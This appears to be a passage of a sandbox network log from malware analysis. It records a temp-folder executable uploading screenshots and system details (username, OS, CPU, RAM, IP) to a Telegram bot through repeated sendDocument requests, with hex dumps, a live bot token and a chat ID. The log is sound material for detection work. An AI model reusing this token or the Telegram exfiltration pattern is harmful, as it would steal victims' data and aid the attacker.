2025-01-08 11:33:10 UTC	16355	OUT	Data Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
2025-01-08 11:33:10 UTC	16355	OUT	Data Raw: b9 3d cd 74 c1 c3 2f ad 71 b7 9a 74 96 aa 1c f2 84 e0 13 c1 fc ab 47 40 93 3b a3 5b 86 ca 8c 98 9c 64 7d 54 f6 ab cd b0 f1 c4 c3 eb b4 e7 75 da df d7 e2 8d f0 b8 28 e1 69 7b 34 ee 2e a3 a4 b2 cf ba d8 65 1f 24 2f a1 f4 ac 8c 57 60 1c 37 07 d6 b9 ed 66 11 0e a0 c5 46 03 8d ff 00 e3 5d 79 36 65 3a ef d8 55 d5 a5 a3 f4 3e 7f 35 cb e3 41 7b 6a 7b 37 b1 42 8a 28 af a4 3c 20 a4 a5 a2 80 3b b9 60 0f f3 27 0d fc ea 01 90 70 7a 8a b8 6a 9b 1f de bf fb c6 bf 3d a8 96 e7 e8 11 24 53 5c 75 ff 00 fc 84 2e 7f eb ab 7f 33 5d 82 9a e3 ef ff 00 e4 21 73 ff 00 5d 5b f9 9a f6 f2 3f e2 4f d0 f1 33 af 82 1e a5 7a 28 a2 be 9c f9 b0 a2 8a 28 00 ae bf c2 1f f2 0b 97 fe bb 9f fd 05 6b 86 d4 3f d4 0f f7 bf c6 a4 7d 02 f1 75 1b 4b 20 f0 b3 dd 46 24 8d d4 9d b8 39 eb c7 b5 72 62 a0 Data Ascii: =t/qtG@;[d}Tu(i{4.e$/W`7fF]y6e:U>5A{j{7B(< ;`'pzj=$S\u.3]!s][?O3z((k?}uK F$9rb
2025-01-08 11:33:10 UTC	16355	OUT	Data Raw: 19 cc 7f 28 25 7a af 41 8f 97 1d 31 4e ba bd 96 5d 0e 4b 38 66 b6 0d b2 45 99 66 f3 f7 48 c5 89 0c bb 7e 42 71 8c 16 19 04 56 7f 5a 95 af ca 6c b0 10 e6 b3 9a 2e b7 c9 71 34 04 82 f0 b9 46 da 72 33 45 57 89 d6 6d 43 50 b8 8c ee 8a 69 d9 d0 e0 8c 82 7d 0d 58 ae 9a 32 73 a6 a5 2d ce 1a f0 8c 2a ca 31 d9 05 00 65 82 e5 57 82 c5 98 f0 aa 06 49 3f 40 28 a8 2e 37 06 8d 92 e4 5b 3a 92 56 56 04 80 71 df 00 9c 1e 9d 0f 5a aa 8d a8 b6 b7 26 94 54 a6 94 b6 25 8e 58 a4 0e eb 73 07 90 80 13 3e 5b 66 4f 41 8d bb b3 c1 e3 1d b3 d3 9a 52 51 49 66 9e 11 08 8f cd f3 f2 c5 36 e7 6f a6 ef bd c6 31 9a cf 73 67 2e eb 60 62 85 41 8a 53 32 44 c2 07 91 55 83 80 a0 6e 50 77 0c 7c bd 41 e0 03 45 c0 d9 35 a8 b5 d4 ad 52 24 85 fe 77 05 e3 90 b3 0d c8 d1 e0 b6 d1 81 8d cb 82 46 7d 2b Data Ascii: (%zA1N]K8fEfH~BqVZl.q4Fr3EWmCPi}X2s-*1eWI?@(.7[:VVqZ&T%Xs>[fOARQIf6o1sg.`bAS2DUnPw\|AE5R$wF}+
2025-01-08 11:33:10 UTC	15447	OUT	Data Raw: b2 af dd 0c 08 c3 63 b6 73 8a bb 45 4f d5 e9 f6 34 fa e5 7f e6 33 ee 2d ee ee e5 dd 37 92 ac d1 79 12 3a 2e 37 c7 90 42 ed fb aa 01 03 ee 81 4a f6 77 42 3b 78 a2 bc 2b 0d be f1 1a 15 07 68 71 86 c7 1d c1 35 7e 8a 5f 56 a5 6b 58 af af 57 bd f9 8a 31 59 dc 41 f6 5f 2a e7 06 d3 fd 43 6d 19 4e 73 8c e3 91 ec 78 a5 86 da ea d9 7f d1 ee 42 b3 4a b3 31 2a 0e 5d 49 20 fe 64 d5 da 2a bd 85 3e c4 7d 6a b7 f3 15 e0 8e e1 76 09 e6 12 2a 02 14 05 c6 32 49 3f a9 35 24 a8 64 51 b5 8a b2 90 ca c3 b1 1d 0d 49 45 5a 82 8a e5 46 52 a9 29 4b 9d bd 4c f6 b1 9d d6 f0 3d d1 3f 6d 60 d7 1c 0f de 10 72 33 f8 fa 52 a5 95 c4 6e ee 97 03 73 44 b0 90 c8 ac a5 17 01 41 52 30 71 81 cd 5f a2 b3 fa bd 2e c6 df 5c af fc c5 0f b1 5c ac 8f 32 5d 62 69 26 49 d9 8a 03 f3 a9 ca b0 c8 e3 19 ed Data Ascii: csEO43-7y:.7BJwB;x+hq5~_VkXW1YA_CmNsxBJ1]I d>}jv2I?5$dQIEZFR)KL=?m`r3RnsDAR0q_.\\2]bi&I
2025-01-08 11:33:10 UTC	11878	OUT	Data Raw: 09 0a e0 9e be c2 b1 f5 9b 09 35 00 25 8b 4f 9e 3b 91 c6 e2 d1 e1 87 a1 f9 ab 4a e7 51 48 27 68 8c b6 6a 57 1c 49 73 b1 ba 77 18 e2 9d 69 7c b7 32 94 59 6d 58 85 ce 21 9f 79 fc b0 38 ae 25 19 c7 de 47 44 9c 27 78 4b 53 83 07 20 1a 5a 6a fd d1 f4 a5 af 7e 2e f1 4c f8 f9 ab 49 a4 14 51 45 51 21 5d 3f 84 3f d5 5d 7f bc bf d6 b9 8a e9 bc 23 fe ae eb ea bf d6 b8 f1 bf c2 3d 1c b3 f8 ff 00 26 6b 7f 6b 69 bf f4 11 b5 ff 00 bf cb fe 34 7f 6a e9 bf f4 10 b5 ff 00 bf cb fe 35 5e da f6 1b 0f 0d 5a dc ce d8 44 b7 8f 8e e4 ed 18 03 de ad d9 5e 43 7d 66 97 50 b6 51 c6 79 ed ea 0d 79 8e 29 6b 67 6f eb c8 fa 05 36 f4 ba be ff 00 d6 a5 03 77 15 c5 cc b1 5b 4d 65 70 26 39 0b f6 81 93 f2 80 46 00 3e 95 cc ea 56 ff 00 65 be 92 1d a1 71 83 80 db 80 c8 cf 5c 0a ec 6f 4e 6e b4 Data Ascii: 5%O;JQH'hjWIswi\|2YmX!y8%GD'xKS Zj~.LIQEQ!]??]#=&kki4j5^ZD^C}fPQyy)kgo6w[Mep&9F>Veq\oNn
2025-01-08 11:33:10 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 34 33 31 64 65 35 31 61 62 61 65 61 2d 2d 0d 0a Data Ascii: -----------------------------8dd431de51abaea--
2025-01-08 11:33:11 UTC	1491	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 08 Jan 2025 11:33:11 GMT Content-Type: application/json Content-Length: 1102 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":138004,"from":{"id":5145135161,"is_bot":true,"first_name":"U2origin","username":"U2originbot"},"chat":{"id":1279485009,"first_name":"Max","username":"zacsees","type":"private"},"date":1736335991,"document":{"file_name":"user-116938 2025-02-02 00-09-43.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQIbFGd-YndRBa2b3J-KSuo_BNg_Z13DAAJVFgACPzjxU5dr8-63oNnnAQAHbQADNgQ","file_unique_id":"AQADVRYAAj848VNy","file_size":14215,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQIbFGd-YndRBa2b3J-KSuo_BNg_Z13DAAJVFgACPzjxU5dr8-63oNnnAQAHbQADNgQ","file_unique_id":"AQADVRYAAj848VNy","file_size":14215,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAECGxRnfmJ3UQWtm9yfikrqPwTYP2ddwwACVRYAAj848VOXa_Put6DZ5zYE","file_unique_id":"AgADVRYAAj848VM","file_size":76835},"caption":"New SC Recovered!\n\nTime: 02/01/2025 23:49:41\nUser Name: user/116938\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.7	49733	149.154.167.220	443	4516	C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 11:33:11 UTC	238	OUT	POST /bot5145135161:AAFnBnjYGtIUE_EwGqQ3-YIV1FOEItrzy8c/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd4549e7f1ca04 Host: api.telegram.org Content-Length: 77464 Expect: 100-continue
2025-01-08 11:33:12 UTC	25	IN	HTTP/1.1 100 Continue
2025-01-08 11:33:12 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 34 35 34 39 65 37 66 31 63 61 30 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 32 37 39 34 38 35 30 30 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 34 35 34 39 65 37 66 31 63 61 30 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 32 2f 30 34 2f 32 30 32 35 20 31 38 3a 31 39 3a 34 37 0a 55 73 65 72 Data Ascii: -----------------------------8dd4549e7f1ca04Content-Disposition: form-data; name="chat_id"1279485009-----------------------------8dd4549e7f1ca04Content-Disposition: form-data; name="caption"New SC Recovered!Time: 02/04/2025 18:19:47User
2025-01-08 11:33:12 UTC	16355	OUT	Data Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
2025-01-08 11:33:12 UTC	16355	OUT	Data Raw: b9 3d cd 74 c1 c3 2f ad 71 b7 9a 74 96 aa 1c f2 84 e0 13 c1 fc ab 47 40 93 3b a3 5b 86 ca 8c 98 9c 64 7d 54 f6 ab cd b0 f1 c4 c3 eb b4 e7 75 da df d7 e2 8d f0 b8 28 e1 69 7b 34 ee 2e a3 a4 b2 cf ba d8 65 1f 24 2f a1 f4 ac 8c 57 60 1c 37 07 d6 b9 ed 66 11 0e a0 c5 46 03 8d ff 00 e3 5d 79 36 65 3a ef d8 55 d5 a5 a3 f4 3e 7f 35 cb e3 41 7b 6a 7b 37 b1 42 8a 28 af a4 3c 20 a4 a5 a2 80 3b b9 60 0f f3 27 0d fc ea 01 90 70 7a 8a b8 6a 9b 1f de bf fb c6 bf 3d a8 96 e7 e8 11 24 53 5c 75 ff 00 fc 84 2e 7f eb ab 7f 33 5d 82 9a e3 ef ff 00 e4 21 73 ff 00 5d 5b f9 9a f6 f2 3f e2 4f d0 f1 33 af 82 1e a5 7a 28 a2 be 9c f9 b0 a2 8a 28 00 ae bf c2 1f f2 0b 97 fe bb 9f fd 05 6b 86 d4 3f d4 0f f7 bf c6 a4 7d 02 f1 75 1b 4b 20 f0 b3 dd 46 24 8d d4 9d b8 39 eb c7 b5 72 62 a0 Data Ascii: =t/qtG@;[d}Tu(i{4.e$/W`7fF]y6e:U>5A{j{7B(< ;`'pzj=$S\u.3]!s][?O3z((k?}uK F$9rb
2025-01-08 11:33:12 UTC	16355	OUT	Data Raw: 19 cc 7f 28 25 7a af 41 8f 97 1d 31 4e ba bd 96 5d 0e 4b 38 66 b6 0d b2 45 99 66 f3 f7 48 c5 89 0c bb 7e 42 71 8c 16 19 04 56 7f 5a 95 af ca 6c b0 10 e6 b3 9a 2e b7 c9 71 34 04 82 f0 b9 46 da 72 33 45 57 89 d6 6d 43 50 b8 8c ee 8a 69 d9 d0 e0 8c 82 7d 0d 58 ae 9a 32 73 a6 a5 2d ce 1a f0 8c 2a ca 31 d9 05 00 65 82 e5 57 82 c5 98 f0 aa 06 49 3f 40 28 a8 2e 37 06 8d 92 e4 5b 3a 92 56 56 04 80 71 df 00 9c 1e 9d 0f 5a aa 8d a8 b6 b7 26 94 54 a6 94 b6 25 8e 58 a4 0e eb 73 07 90 80 13 3e 5b 66 4f 41 8d bb b3 c1 e3 1d b3 d3 9a 52 51 49 66 9e 11 08 8f cd f3 f2 c5 36 e7 6f a6 ef bd c6 31 9a cf 73 67 2e eb 60 62 85 41 8a 53 32 44 c2 07 91 55 83 80 a0 6e 50 77 0c 7c bd 41 e0 03 45 c0 d9 35 a8 b5 d4 ad 52 24 85 fe 77 05 e3 90 b3 0d c8 d1 e0 b6 d1 81 8d cb 82 46 7d 2b Data Ascii: (%zA1N]K8fEfH~BqVZl.q4Fr3EWmCPi}X2s-*1eWI?@(.7[:VVqZ&T%Xs>[fOARQIf6o1sg.`bAS2DUnPw\|AE5R$wF}+
2025-01-08 11:33:12 UTC	15447	OUT	Data Raw: b2 af dd 0c 08 c3 63 b6 73 8a bb 45 4f d5 e9 f6 34 fa e5 7f e6 33 ee 2d ee ee e5 dd 37 92 ac d1 79 12 3a 2e 37 c7 90 42 ed fb aa 01 03 ee 81 4a f6 77 42 3b 78 a2 bc 2b 0d be f1 1a 15 07 68 71 86 c7 1d c1 35 7e 8a 5f 56 a5 6b 58 af af 57 bd f9 8a 31 59 dc 41 f6 5f 2a e7 06 d3 fd 43 6d 19 4e 73 8c e3 91 ec 78 a5 86 da ea d9 7f d1 ee 42 b3 4a b3 31 2a 0e 5d 49 20 fe 64 d5 da 2a bd 85 3e c4 7d 6a b7 f3 15 e0 8e e1 76 09 e6 12 2a 02 14 05 c6 32 49 3f a9 35 24 a8 64 51 b5 8a b2 90 ca c3 b1 1d 0d 49 45 5a 82 8a e5 46 52 a9 29 4b 9d bd 4c f6 b1 9d d6 f0 3d d1 3f 6d 60 d7 1c 0f de 10 72 33 f8 fa 52 a5 95 c4 6e ee 97 03 73 44 b0 90 c8 ac a5 17 01 41 52 30 71 81 cd 5f a2 b3 fa bd 2e c6 df 5c af fc c5 0f b1 5c ac 8f 32 5d 62 69 26 49 d9 8a 03 f3 a9 ca b0 c8 e3 19 ed Data Ascii: csEO43-7y:.7BJwB;x+hq5~_VkXW1YA_CmNsxBJ1]I d>}jv2I?5$dQIEZFR)KL=?m`r3RnsDAR0q_.\\2]bi&I
2025-01-08 11:33:12 UTC	11878	OUT	Data Raw: 09 0a e0 9e be c2 b1 f5 9b 09 35 00 25 8b 4f 9e 3b 91 c6 e2 d1 e1 87 a1 f9 ab 4a e7 51 48 27 68 8c b6 6a 57 1c 49 73 b1 ba 77 18 e2 9d 69 7c b7 32 94 59 6d 58 85 ce 21 9f 79 fc b0 38 ae 25 19 c7 de 47 44 9c 27 78 4b 53 83 07 20 1a 5a 6a fd d1 f4 a5 af 7e 2e f1 4c f8 f9 ab 49 a4 14 51 45 51 21 5d 3f 84 3f d5 5d 7f bc bf d6 b9 8a e9 bc 23 fe ae eb ea bf d6 b8 f1 bf c2 3d 1c b3 f8 ff 00 26 6b 7f 6b 69 bf f4 11 b5 ff 00 bf cb fe 34 7f 6a e9 bf f4 10 b5 ff 00 bf cb fe 35 5e da f6 1b 0f 0d 5a dc ce d8 44 b7 8f 8e e4 ed 18 03 de ad d9 5e 43 7d 66 97 50 b6 51 c6 79 ed ea 0d 79 8e 29 6b 67 6f eb c8 fa 05 36 f4 ba be ff 00 d6 a5 03 77 15 c5 cc b1 5b 4d 65 70 26 39 0b f6 81 93 f2 80 46 00 3e 95 cc ea 56 ff 00 65 be 92 1d a1 71 83 80 db 80 c8 cf 5c 0a ec 6f 4e 6e b4 Data Ascii: 5%O;JQH'hjWIswi\|2YmX!y8%GD'xKS Zj~.LIQEQ!]??]#=&kki4j5^ZD^C}fPQyy)kgo6w[Mep&9F>Veq\oNn
2025-01-08 11:33:12 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 34 35 34 39 65 37 66 31 63 61 30 34 2d 2d 0d 0a Data Ascii: -----------------------------8dd4549e7f1ca04--
2025-01-08 11:33:12 UTC	1491	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 08 Jan 2025 11:33:12 GMT Content-Type: application/json Content-Length: 1102 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":138005,"from":{"id":5145135161,"is_bot":true,"first_name":"U2origin","username":"U2originbot"},"chat":{"id":1279485009,"first_name":"Max","username":"zacsees","type":"private"},"date":1736335992,"document":{"file_name":"user-116938 2025-02-04 18-29-48.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQIbFWd-YniYR0_bDmqNTe6NepABsioaAAJWFgACPzjxU_K4VfDWcP5ZAQAHbQADNgQ","file_unique_id":"AQADVhYAAj848VNy","file_size":14215,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQIbFWd-YniYR0_bDmqNTe6NepABsioaAAJWFgACPzjxU_K4VfDWcP5ZAQAHbQADNgQ","file_unique_id":"AQADVhYAAj848VNy","file_size":14215,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAECGxVnfmJ4mEdP2w5qjU3ujXqQAbIqGgACVhYAAj848VPyuFXw1nD-WTYE","file_unique_id":"AgADVhYAAj848VM","file_size":76835},"caption":"New SC Recovered!\n\nTime: 02/04/2025 18:19:47\nUser Name: user/116938\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.7	49734	149.154.167.220	443	4516	C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 11:33:16 UTC	238	OUT	POST /bot5145135161:AAFnBnjYGtIUE_EwGqQ3-YIV1FOEItrzy8c/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd48c1ba4896da Host: api.telegram.org Content-Length: 77464 Expect: 100-continue
2025-01-08 11:33:17 UTC	25	IN	HTTP/1.1 100 Continue
2025-01-08 11:33:17 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 34 38 63 31 62 61 34 38 39 36 64 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 32 37 39 34 38 35 30 30 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 34 38 63 31 62 61 34 38 39 36 64 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 32 2f 30 39 2f 32 30 32 35 20 30 34 3a 30 35 3a 30 33 0a 55 73 65 72 Data Ascii: -----------------------------8dd48c1ba4896daContent-Disposition: form-data; name="chat_id"1279485009-----------------------------8dd48c1ba4896daContent-Disposition: form-data; name="caption"New SC Recovered!Time: 02/09/2025 04:05:03User
2025-01-08 11:33:17 UTC	16355	OUT	Data Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
2025-01-08 11:33:17 UTC	16355	OUT	Data Raw: b9 3d cd 74 c1 c3 2f ad 71 b7 9a 74 96 aa 1c f2 84 e0 13 c1 fc ab 47 40 93 3b a3 5b 86 ca 8c 98 9c 64 7d 54 f6 ab cd b0 f1 c4 c3 eb b4 e7 75 da df d7 e2 8d f0 b8 28 e1 69 7b 34 ee 2e a3 a4 b2 cf ba d8 65 1f 24 2f a1 f4 ac 8c 57 60 1c 37 07 d6 b9 ed 66 11 0e a0 c5 46 03 8d ff 00 e3 5d 79 36 65 3a ef d8 55 d5 a5 a3 f4 3e 7f 35 cb e3 41 7b 6a 7b 37 b1 42 8a 28 af a4 3c 20 a4 a5 a2 80 3b b9 60 0f f3 27 0d fc ea 01 90 70 7a 8a b8 6a 9b 1f de bf fb c6 bf 3d a8 96 e7 e8 11 24 53 5c 75 ff 00 fc 84 2e 7f eb ab 7f 33 5d 82 9a e3 ef ff 00 e4 21 73 ff 00 5d 5b f9 9a f6 f2 3f e2 4f d0 f1 33 af 82 1e a5 7a 28 a2 be 9c f9 b0 a2 8a 28 00 ae bf c2 1f f2 0b 97 fe bb 9f fd 05 6b 86 d4 3f d4 0f f7 bf c6 a4 7d 02 f1 75 1b 4b 20 f0 b3 dd 46 24 8d d4 9d b8 39 eb c7 b5 72 62 a0 Data Ascii: =t/qtG@;[d}Tu(i{4.e$/W`7fF]y6e:U>5A{j{7B(< ;`'pzj=$S\u.3]!s][?O3z((k?}uK F$9rb
2025-01-08 11:33:17 UTC	16355	OUT	Data Raw: 19 cc 7f 28 25 7a af 41 8f 97 1d 31 4e ba bd 96 5d 0e 4b 38 66 b6 0d b2 45 99 66 f3 f7 48 c5 89 0c bb 7e 42 71 8c 16 19 04 56 7f 5a 95 af ca 6c b0 10 e6 b3 9a 2e b7 c9 71 34 04 82 f0 b9 46 da 72 33 45 57 89 d6 6d 43 50 b8 8c ee 8a 69 d9 d0 e0 8c 82 7d 0d 58 ae 9a 32 73 a6 a5 2d ce 1a f0 8c 2a ca 31 d9 05 00 65 82 e5 57 82 c5 98 f0 aa 06 49 3f 40 28 a8 2e 37 06 8d 92 e4 5b 3a 92 56 56 04 80 71 df 00 9c 1e 9d 0f 5a aa 8d a8 b6 b7 26 94 54 a6 94 b6 25 8e 58 a4 0e eb 73 07 90 80 13 3e 5b 66 4f 41 8d bb b3 c1 e3 1d b3 d3 9a 52 51 49 66 9e 11 08 8f cd f3 f2 c5 36 e7 6f a6 ef bd c6 31 9a cf 73 67 2e eb 60 62 85 41 8a 53 32 44 c2 07 91 55 83 80 a0 6e 50 77 0c 7c bd 41 e0 03 45 c0 d9 35 a8 b5 d4 ad 52 24 85 fe 77 05 e3 90 b3 0d c8 d1 e0 b6 d1 81 8d cb 82 46 7d 2b Data Ascii: (%zA1N]K8fEfH~BqVZl.q4Fr3EWmCPi}X2s-*1eWI?@(.7[:VVqZ&T%Xs>[fOARQIf6o1sg.`bAS2DUnPw\|AE5R$wF}+
2025-01-08 11:33:17 UTC	15447	OUT	Data Raw: b2 af dd 0c 08 c3 63 b6 73 8a bb 45 4f d5 e9 f6 34 fa e5 7f e6 33 ee 2d ee ee e5 dd 37 92 ac d1 79 12 3a 2e 37 c7 90 42 ed fb aa 01 03 ee 81 4a f6 77 42 3b 78 a2 bc 2b 0d be f1 1a 15 07 68 71 86 c7 1d c1 35 7e 8a 5f 56 a5 6b 58 af af 57 bd f9 8a 31 59 dc 41 f6 5f 2a e7 06 d3 fd 43 6d 19 4e 73 8c e3 91 ec 78 a5 86 da ea d9 7f d1 ee 42 b3 4a b3 31 2a 0e 5d 49 20 fe 64 d5 da 2a bd 85 3e c4 7d 6a b7 f3 15 e0 8e e1 76 09 e6 12 2a 02 14 05 c6 32 49 3f a9 35 24 a8 64 51 b5 8a b2 90 ca c3 b1 1d 0d 49 45 5a 82 8a e5 46 52 a9 29 4b 9d bd 4c f6 b1 9d d6 f0 3d d1 3f 6d 60 d7 1c 0f de 10 72 33 f8 fa 52 a5 95 c4 6e ee 97 03 73 44 b0 90 c8 ac a5 17 01 41 52 30 71 81 cd 5f a2 b3 fa bd 2e c6 df 5c af fc c5 0f b1 5c ac 8f 32 5d 62 69 26 49 d9 8a 03 f3 a9 ca b0 c8 e3 19 ed Data Ascii: csEO43-7y:.7BJwB;x+hq5~_VkXW1YA_CmNsxBJ1]I d>}jv2I?5$dQIEZFR)KL=?m`r3RnsDAR0q_.\\2]bi&I
